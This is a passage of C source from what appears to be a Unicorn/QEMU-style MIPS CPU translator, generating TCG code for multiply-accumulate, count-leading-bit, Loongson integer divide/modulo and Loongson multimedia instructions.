tcg_gen_mulu2_i64(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc], t0, t1); break; #endif case OPC_MADD: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case OPC_MADDU: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case OPC_MSUB: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case OPC_MSUBU: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; default: MIPS_INVAL("mul/div"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* * These MULT[U] and MADD[U] instructions implemented in for example * the Toshiba/Sony R5900 and the Toshiba TX19, TX39 and TX79 core * architectures are special three-operand variants with the syntax * * MULT[U][1] rd, rs, rt * * such that * * (rd, LO, HI) <- rs * rt * * and * * MADD[U][1] rd, rs, rt * * such that * * (rd, LO, HI) <- (LO, HI) + rs * rt * * where the low-order 
32-bits of the result is placed into both the * GPR rd and the special register LO. The high-order 32-bits of the * result is placed into the special register HI. * * If the GPR rd is omitted in assembly language, it is taken to be 0, * which is the zero register that always reads as 0. */ static void gen_mul_txx9(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); int acc = 0; gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case MMI_OPC_MULT1: acc = 1; /* Fall through */ case OPC_MULT: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); if (rd) { tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case MMI_OPC_MULTU1: acc = 1; /* Fall through */ case OPC_MULTU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); if (rd) { tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case MMI_OPC_MADD1: acc = 1; /* Fall through */ case MMI_OPC_MADD: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); if (rd) { gen_move_low32(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_temp_free_i64(tcg_ctx, t2); } break; case MMI_OPC_MADDU1: acc = 1; /* Fall through */ case MMI_OPC_MADDU: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); if (rd) { gen_move_low32(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_temp_free_i64(tcg_ctx, t2); } break; default: MIPS_INVAL("mul/madd TXx9"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_mul_vr54xx(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_VR54XX_MULS: gen_helper_muls(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULSU: gen_helper_mulsu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACC: 
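/*
 * MACC, like the other VR54xx variants below, is handled entirely by
 * a helper; the helper is expected to update HI/LO in the CPU state
 * and return the GPR result in t0.
 */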
gen_helper_macc(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACCU: gen_helper_maccu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSAC: gen_helper_msac(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSACU: gen_helper_msacu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULHI: gen_helper_mulhi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULHIU: gen_helper_mulhiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULSHI: gen_helper_mulshi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULSHIU: gen_helper_mulshiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACCHI: gen_helper_macchi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACCHIU: gen_helper_macchiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSACHI: gen_helper_msachi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSACHIU: gen_helper_msachiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; default: MIPS_INVAL("mul vr54xx"); generate_exception_end(ctx, EXCP_RI); goto out; } gen_store_gpr(tcg_ctx, t0, rd); out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_cl(DisasContext *ctx, uint32_t opc, int rd, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_ctx->cpu_gpr[rd]; gen_load_gpr(tcg_ctx, t0, rs); switch (opc) { case OPC_CLO: case R6_OPC_CLO: #if defined(TARGET_MIPS64) case OPC_DCLO: case R6_OPC_DCLO: #endif tcg_gen_not_tl(tcg_ctx, t0, t0); break; } switch (opc) { case OPC_CLO: case R6_OPC_CLO: case OPC_CLZ: case R6_OPC_CLZ: tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_clzi_tl(tcg_ctx, t0, t0, TARGET_LONG_BITS); tcg_gen_subi_tl(tcg_ctx, t0, t0, TARGET_LONG_BITS - 32); break; #if defined(TARGET_MIPS64) case OPC_DCLO: case R6_OPC_DCLO: case OPC_DCLZ: case R6_OPC_DCLZ: tcg_gen_clzi_i64(tcg_ctx, t0, t0, 64); break; #endif } } /* Godson integer instructions */ static void gen_loongson_integer(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* Treat as NOP. 
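 * Every Loongson integer op below targets a GPR, so rd == 0 can be
 * skipped outright.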
*/ return; } switch (opc) { case OPC_MULT_G_2E: case OPC_MULT_G_2F: case OPC_MULTU_G_2E: case OPC_MULTU_G_2F: #if defined(TARGET_MIPS64) case OPC_DMULT_G_2E: case OPC_DMULT_G_2F: case OPC_DMULTU_G_2E: case OPC_DMULTU_G_2F: #endif t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); break; default: t0 = tcg_temp_local_new(tcg_ctx); t1 = tcg_temp_local_new(tcg_ctx); break; } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_MULT_G_2E: case OPC_MULT_G_2F: tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); break; case OPC_MULTU_G_2E: case OPC_MULTU_G_2F: tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); break; case OPC_DIV_G_2E: case OPC_DIV_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l3); } break; case OPC_DIVU_G_2E: case OPC_DIVU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l2); } break; case OPC_MOD_G_2E: case OPC_MOD_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l3); } break; case OPC_MODU_G_2E: case OPC_MODU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l2); } break; #if defined(TARGET_MIPS64) case OPC_DMULT_G_2E: case OPC_DMULT_G_2F: tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case OPC_DMULTU_G_2E: case OPC_DMULTU_G_2F: 
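/*
 * The low 64 bits of a product do not depend on operand signedness,
 * so DMULT_G and DMULTU_G share one mul operation.
 */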
tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case OPC_DDIV_G_2E: case OPC_DDIV_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1LL << 63, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l3); } break; case OPC_DDIVU_G_2E: case OPC_DDIVU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l2); } break; case OPC_DMOD_G_2E: case OPC_DMOD_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1LL << 63, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l3); } break; case OPC_DMODU_G_2E: case OPC_DMODU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l2); } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* Loongson multimedia instructions */ static void gen_loongson_multimedia(DisasContext *ctx, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t opc, shift_max; TCGv_i64 t0, t1; TCGCond cond; opc = MASK_LMI(ctx->opcode); switch (opc) { case OPC_ADD_CP2: case OPC_SUB_CP2: case OPC_DADD_CP2: case OPC_DSUB_CP2: t0 = tcg_temp_local_new_i64(tcg_ctx); t1 = tcg_temp_local_new_i64(tcg_ctx); break; default: t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); break; } check_cp1_enabled(ctx); gen_load_fpr64(ctx, t0, rs); gen_load_fpr64(ctx, t1, rt); switch (opc) { case OPC_PADDSH: gen_helper_paddsh(tcg_ctx, t0, t0, t1); break; case OPC_PADDUSH: gen_helper_paddush(tcg_ctx, t0, t0, t1); break; case OPC_PADDH: gen_helper_paddh(tcg_ctx, t0, t0, t1); break; case OPC_PADDW: gen_helper_paddw(tcg_ctx, t0, t0, t1); break; case OPC_PADDSB: gen_helper_paddsb(tcg_ctx, t0, t0, t1); break; case OPC_PADDUSB: gen_helper_paddusb(tcg_ctx, t0, t0, t1); break; case OPC_PADDB: gen_helper_paddb(tcg_ctx, t0, t0, t1); break; case OPC_PSUBSH: gen_helper_psubsh(tcg_ctx, t0, t0, t1); break; case OPC_PSUBUSH: gen_helper_psubush(tcg_ctx, t0, t0, t1); break; case OPC_PSUBH: gen_helper_psubh(tcg_ctx, t0, t0, t1); break; case OPC_PSUBW: gen_helper_psubw(tcg_ctx, t0, t0, t1); break; case OPC_PSUBSB: gen_helper_psubsb(tcg_ctx, t0, t0, t1); break; case OPC_PSUBUSB: gen_helper_psubusb(tcg_ctx, t0, t0, t1); break; case OPC_PSUBB: gen_helper_psubb(tcg_ctx, t0, t0, t1); break; case 
OPC_PSHUFH: gen_helper_pshufh(tcg_ctx, t0, t0, t1); break; case OPC_PACKSSWH: gen_helper_packsswh(tcg_ctx, t0, t0, t1); break; case OPC_PACKSSHB: gen_helper_packsshb(tcg_ctx, t0, t0, t1); break; case OPC_PACKUSHB: gen_helper_packushb(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKLHW: gen_helper_punpcklhw(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKHHW: gen_helper_punpckhhw(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKLBH: gen_helper_punpcklbh(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKHBH: gen_helper_punpckhbh(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKLWD: gen_helper_punpcklwd(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKHWD: gen_helper_punpckhwd(tcg_ctx, t0, t0, t1); break; case OPC_PAVGH: gen_helper_pavgh(tcg_ctx, t0, t0, t1); break; case OPC_PAVGB: gen_helper_pavgb(tcg_ctx, t0, t0, t1); break; case OPC_PMAXSH: gen_helper_pmaxsh(tcg_ctx, t0, t0, t1); break; case OPC_PMINSH: gen_helper_pminsh(tcg_ctx, t0, t0, t1); break; case OPC_PMAXUB: gen_helper_pmaxub(tcg_ctx, t0, t0, t1); break; case OPC_PMINUB: gen_helper_pminub(tcg_ctx, t0, t0, t1); break; case OPC_PCMPEQW: gen_helper_pcmpeqw(tcg_ctx, t0, t0, t1); break; case OPC_PCMPGTW: gen_helper_pcmpgtw(tcg_ctx, t0, t0, t1); break; case OPC_PCMPEQH: gen_helper_pcmpeqh(tcg_ctx, t0, t0, t1); break; case OPC_PCMPGTH: gen_helper_pcmpgth(tcg_ctx, t0, t0, t1); break; case OPC_PCMPEQB: gen_helper_pcmpeqb(tcg_ctx, t0, t0, t1); break; case OPC_PCMPGTB: gen_helper_pcmpgtb(tcg_ctx, t0, t0, t1); break; case OPC_PSLLW: gen_helper_psllw(tcg_ctx, t0, t0, t1); break; case OPC_PSLLH: gen_helper_psllh(tcg_ctx, t0, t0, t1); break; case OPC_PSRLW: gen_helper_psrlw(tcg_ctx, t0, t0, t1); break; case OPC_PSRLH: gen_helper_psrlh(tcg_ctx, t0, t0, t1); break; case OPC_PSRAW: gen_helper_psraw(tcg_ctx, t0, t0, t1); break; case OPC_PSRAH: gen_helper_psrah(tcg_ctx, t0, t0, t1); break; case OPC_PMULLH: gen_helper_pmullh(tcg_ctx, t0, t0, t1); break; case OPC_PMULHH: gen_helper_pmulhh(tcg_ctx, t0, t0, t1); break; case OPC_PMULHUH: gen_helper_pmulhuh(tcg_ctx, t0, t0, t1); break; case OPC_PMADDHW: gen_helper_pmaddhw(tcg_ctx, t0, t0, t1); break; case OPC_PASUBUB: gen_helper_pasubub(tcg_ctx, t0, t0, t1); break; case OPC_BIADD: gen_helper_biadd(tcg_ctx, t0, t0); break; case OPC_PMOVMSKB: gen_helper_pmovmskb(tcg_ctx, t0, t0); break; case OPC_PADDD: tcg_gen_add_i64(tcg_ctx, t0, t0, t1); break; case OPC_PSUBD: tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); break; case OPC_XOR_CP2: tcg_gen_xor_i64(tcg_ctx, t0, t0, t1); break; case OPC_NOR_CP2: tcg_gen_nor_i64(tcg_ctx, t0, t0, t1); break; case OPC_AND_CP2: tcg_gen_and_i64(tcg_ctx, t0, t0, t1); break; case OPC_OR_CP2: tcg_gen_or_i64(tcg_ctx, t0, t0, t1); break; case OPC_PANDN: tcg_gen_andc_i64(tcg_ctx, t0, t1, t0); break; case OPC_PINSRH_0: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 0, 16); break; case OPC_PINSRH_1: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 16, 16); break; case OPC_PINSRH_2: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 32, 16); break; case OPC_PINSRH_3: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 48, 16); break; case OPC_PEXTRH: tcg_gen_andi_i64(tcg_ctx, t1, t1, 3); tcg_gen_shli_i64(tcg_ctx, t1, t1, 4); tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); tcg_gen_ext16u_i64(tcg_ctx, t0, t0); break; case OPC_ADDU_CP2: tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_ext32s_i64(tcg_ctx, t0, t0); break; case OPC_SUBU_CP2: tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); tcg_gen_ext32s_i64(tcg_ctx, t0, t0); break; case OPC_SLL_CP2: shift_max = 32; goto do_shift; case OPC_SRL_CP2: shift_max = 32; goto do_shift; case OPC_SRA_CP2: shift_max = 32; goto do_shift; case 
OPC_DSLL_CP2: shift_max = 64; goto do_shift; case OPC_DSRL_CP2: shift_max = 64; goto do_shift; case OPC_DSRA_CP2: shift_max = 64; goto do_shift; do_shift: /* Make sure shift count isn't TCG undefined behaviour. */ tcg_gen_andi_i64(tcg_ctx, t1, t1, shift_max - 1); switch (opc) { case OPC_SLL_CP2: case OPC_DSLL_CP2: tcg_gen_shl_i64(tcg_ctx, t0, t0, t1); break; case OPC_SRA_CP2: case OPC_DSRA_CP2: /* * Since SRA is UndefinedResult without sign-extended inputs, * we can treat SRA and DSRA the same. */ tcg_gen_sar_i64(tcg_ctx, t0, t0, t1); break; case OPC_SRL_CP2: /* We want to shift in zeros for SRL; zero-extend first. */ tcg_gen_ext32u_i64(tcg_ctx, t0, t0); /* FALLTHRU */ case OPC_DSRL_CP2: tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); break; } if (shift_max == 32) { tcg_gen_ext32s_i64(tcg_ctx, t0, t0); } /* Shifts larger than MAX produce zero. */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LTU, t1, t1, shift_max); tcg_gen_neg_i64(tcg_ctx, t1, t1); tcg_gen_and_i64(tcg_ctx, t0, t0, t1); break; case OPC_ADD_CP2: case OPC_DADD_CP2: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t2, t0); tcg_gen_add_i64(tcg_ctx, t0, t1, t2); if (opc == OPC_ADD_CP2) { tcg_gen_ext32s_i64(tcg_ctx, t0, t0); } tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); tcg_gen_andc_i64(tcg_ctx, t1, t2, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, lab); break; } case OPC_SUB_CP2: case OPC_DSUB_CP2: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t2, t0); tcg_gen_sub_i64(tcg_ctx, t0, t1, t2); if (opc == OPC_SUB_CP2) { tcg_gen_ext32s_i64(tcg_ctx, t0, t0); } tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); tcg_gen_and_i64(tcg_ctx, t1, t1, t2); tcg_temp_free_i64(tcg_ctx, t2); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, lab); break; } case OPC_PMULUW: tcg_gen_ext32u_i64(tcg_ctx, t0, t0); tcg_gen_ext32u_i64(tcg_ctx, t1, t1); tcg_gen_mul_i64(tcg_ctx, 